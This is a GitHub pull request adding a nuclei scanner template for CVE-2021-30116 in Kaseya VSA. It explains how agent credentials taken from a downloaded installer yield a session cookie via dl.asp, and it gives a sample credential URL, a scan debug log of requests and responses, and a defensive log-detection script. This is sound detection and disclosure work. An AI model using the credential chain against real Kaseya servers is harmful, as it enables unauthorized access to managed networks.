
@daffainfo
Contributor

Template / PR Information

Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021.

By default Kaseya VSA on premise offers a download page where the clients for the installation can be downloaded. The default URL for this page is https://x.x.x.x/dl.asp

When an attacker downloads a client for Windows and installs it, the file KaseyaD.ini is generated (C:\Program Files (x86)\Kaseya\XXXXXXXXXX\KaseyaD.ini) which contains an Agent_Guid and AgentPassword.

This Agent_Guid and AgentPassword can be used to log in on dl.asp (https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9)

This request authenticates the client and returns a sessionId cookie that can be used in subsequent attacks to bypass authentication.

Security issues discovered
---

* Unauthenticated download page leaks credentials
* Credentials of agent software can be used to obtain a sessionId (cookie) that can be used for services not intended for use by agents
* dl.asp accepts credentials via a GET request
* Access to KaseyaD.ini gives an attacker access to sufficient information to penetrate the Kaseya installation and its clients.

Impact
---

Via the page /dl.asp enough information can be obtained to give an attacker a sessionId that can be used to execute further (semi-authenticated) attacks against the system.

Template Validation

I've validated this template locally?

  • YES
  • NO

Debug


                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.3.0 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 124
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2021-30116] Dumped HTTP request for https://REDACTED/dl.asp

GET /dl.asp HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2021-30116] Dumped HTTP response https://REDACTED/dl.asp

HTTP/1.1 200 OK
Connection: close
Content-Length: 6931
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Sat, 11 Oct 2025 04:18:38 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET


<html>
<head>
<title>Download Agent</title>
<link rel="shortcut icon" href="/themes/default/images/favicon.ico?0.840870477993253">
<meta name="robots" content="noindex,nofollow" />
<meta name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0"/>
[SNIPPET]

</head>
<script language='javascript'>
removeFile = true;
unType = "0";
function removeDownload() {
    // launch a new window to run an ASP page in that will delete the download
    // package with this page is unloaded. Make it invisible by positioning it off screen
    if (removeFile == true) {
        delDownloadWin = window.open("/remdl.asp?un="+unType,"delDownloadWin",
            "dependent,toolbar=no,resizable=no,width=2,height=2,top=3000,left=3000");
    }
}
function setupDownload(dlLink) {
    if (dlLink.indexOf("?id=") > 0) {
        unType = "VSA-default-"+dlLink.substr(dlLink.indexOf("?id=")+"?id=".length);
    }
    dlWin = window.open(dlLink,"dlWin","dependent,width=2,height=2,top=3000,left=3000");
}
</script>
<body topmargin=0 leftmargin=3 bgcolor="#FFFFFF" onUnload="removeDownload()">
<p><img src='/ManagedFiles/SiteCustomization/2008logo.gif'></p><p>Install the <b></b> Agent on your machine.<br>The Agent allows your system administrator to remotely and transparently manage your PC.</p><ol><li>Click  to begin installation of the Agent</li><li>Click <b>Open</b> to run this program from its current location</li></ol> <table style='margin:10px 0px 30px 30px;'><tr><td style='padding-right:20px;'><a href='javascript:setupDownload("/mkDefault.asp?id=-1")'>Default Install</a></td><td>Creates a agent in the public &#34;unnamed&#34; group ID.</td></tr><tr><td style='padding-right:20px;'><a href='javascript:setupDownload("/mkDefault.asp?id=11225348")'>Mac Install</a></td><td>For Mac</td></tr> </table>
</body>
</html>
[INF] [CVE-2021-30116] Dumped HTTP request for https://REDACTED/mkDefault.asp?id=-1

GET /mkDefault.asp?id=-1 HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Cookie: ASPSESSIONIDQCCTRRST=INPJEKOAPCICGHJAOPHPADDJ
Accept-Encoding: gzip

[DBG] [CVE-2021-30116] Dumped HTTP response https://REDACTED/mkDefault.asp?id=-1

HTTP/1.1 302 Object moved
Connection: close
Content-Length: 157
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Sat, 11 Oct 2025 04:18:39 GMT
Location: /install/VSA-default--1/KcsSetup.exe
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/install/VSA-default--1/KcsSetup.exe">here</a>.</body>
[CVE-2021-30116:regex-1] [http] [critical] https://REDACTED/mkDefault.asp?id=-1
[CVE-2021-30116:status-2] [http] [critical] https://REDACTED/mkDefault.asp?id=-1
[INF] [CVE-2021-30116] Dumped HTTP request for https://REDACTED/mkDefault.asp?id=11225348

GET /mkDefault.asp?id=11225348 HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (CentOS; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0
Connection: close
Accept: */*
Accept-Language: en
Cookie: ASPSESSIONIDQCCTRRST=INPJEKOAPCICGHJAOPHPADDJ
Accept-Encoding: gzip

[DBG] [CVE-2021-30116] Dumped HTTP response https://REDACTED/mkDefault.asp?id=11225348

HTTP/1.1 302 Object moved
Connection: close
Content-Length: 163
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Sat, 11 Oct 2025 04:18:41 GMT
Location: /install/VSA-default-11225348/KcsSetup.zip
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/install/VSA-default-11225348/KcsSetup.zip">here</a>.</body>
[INF] Scan completed in 4.864080833s. 2 matches found.
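
A log-side check for the behaviour described in this PR, as an added example that is not part of the PR or the nuclei template: it scans IIS W3C logs for installer generation via /mkDefault.asp and for /dl.asp requests that carry `un` and `pw` in the query string. The log lines, IP addresses and credential values are constructed, and the field layout assumes the server logs cs-uri-stem, cs-uri-query, c-ip and sc-status.

```python
from urllib.parse import parse_qs

# Constructed IIS W3C log sample (documentation IPs, made-up credential values).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2025-10-11 04:18:38 GET /dl.asp - 198.51.100.7 200
2025-10-11 04:18:39 GET /mkDefault.asp id=-1 198.51.100.7 302
2025-10-11 04:25:02 GET /dl.asp un=000000000000001&pw=EXAMPLEONLY 198.51.100.7 200
2025-10-11 05:00:00 GET /dl.asp - 203.0.113.20 200
2025-10-11 05:10:00 GET /themes/default/images/favicon.ico - 203.0.113.20 200
2025-10-11 06:00:00 GET /dl.asp un=000000000000002&pw=EXAMPLEONLY 203.0.113.20 200
"""

def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields: line."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def find_dl_asp_abuse(text):
    """Return (client_ip, kind, detail) for installer pulls and GET logins."""
    findings, installer_clients = [], set()
    for rec in parse_w3c(text):
        stem = rec["cs-uri-stem"].lower()
        raw = rec["cs-uri-query"]
        query = parse_qs(raw) if raw != "-" else {}
        ip = rec["c-ip"]
        if stem == "/mkdefault.asp" and rec["sc-status"] == "302":
            installer_clients.add(ip)
            findings.append((ip, "installer-generated", f"id={query.get('id', ['?'])[0]}"))
        elif stem == "/dl.asp" and "un" in query and "pw" in query:
            # Never copy the pw value into alerts; the web log already holds it.
            kind = "agent-login-after-download" if ip in installer_clients else "agent-login-via-get"
            findings.append((ip, kind, f"un={query['un'][0]} pw=<redacted>"))
    return findings

if __name__ == "__main__":
    for finding in find_dl_asp_abuse(SAMPLE_LOG):
        print(finding)
```

Because dl.asp takes the agent credentials in a GET request, the same logs that make this detection possible also store those credentials, so log access should be restricted accordingly.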

@github-actions github-actions bot requested a review from pussycat0x October 11, 2025 04:22
@Akokonunes Akokonunes added the Done Ready to merge label Oct 11, 2025
@Akokonunes
Contributor

Hi @daffainfo, Thank you for contributing templates to the project.

@pussycat0x pussycat0x merged commit 974169b into projectdiscovery:main Oct 20, 2025
4 checks passed
@algora-pbc

algora-pbc bot commented Oct 21, 2025

🎉🎈 @daffainfo has been awarded $200 by ProjectDiscovery! 🎈🎊
